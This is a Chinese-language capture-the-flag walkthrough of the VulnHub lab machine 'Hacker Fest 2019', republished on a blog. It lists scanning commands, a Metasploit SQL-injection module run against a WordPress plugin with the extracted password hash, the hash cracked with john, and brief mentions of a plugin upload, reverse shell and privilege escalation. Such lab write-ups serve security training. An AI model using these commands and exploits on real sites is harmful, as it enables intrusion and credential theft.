靶機地址:
https://www.vulnhub.com/entry/hacker-fest-2019,378/
主機掃描:
FTP嘗試匿名登錄
應該是WordPress的站點
進行目錄掃描:
python3 dirsearch.py http://10.10.203.17/ -e html,json,php
此外還有一個phpmyadmin
http://10.10.203.17/phpmyadmin/index.php
使用wpscan掃描檢測插件漏洞
wpscan --url http://10.10.203.17
msf5 > use auxiliary/admin/http/wp_google_maps_sqli
msf5 auxiliary(admin/http/wp_google_maps_sqli) > set rhosts 10.10.203.17
rhosts => 10.10.203.17
msf5 auxiliary(admin/http/wp_google_maps_sqli) > exploit
[*] Running module against 10.10.203.17
[*] 10.10.203.17:80 - Trying to retrieve the wp_users table...
[+] Credentials saved in: /root/.msf4/loot/20191014174707_default_10.10.203.17_wp_google_maps.j_470411.bin
[+] 10.10.203.17:80 - Found webmaster $P$BsqOdiLTcye6AS1ofreys4GzRlRvSr1 [email protected]
[*] Auxiliary module execution completed
msf5 auxiliary(admin/http/wp_google_maps_sqli) >
密碼hash破解
john --wordlist=/usr/share/wordlists/rockyou.txt hash
kittykat1
http://10.10.203.17/wp-admin/
安裝ubh插件,進行上傳檔案
本地監聽,訪問反彈shell
這里有兩個思路:
1是通過webshell切換到webmaster用戶
2是直接通過遠程ssh登錄系統
進行提權
OVER!
轉載請註明出處,本文鏈接:https://www.uj5u.com/qiye/6887.html
標籤:訊息安全
上一篇:bossplayersCTF 1: Vulnhub Walkthrough
下一篇:學習SQL注入---1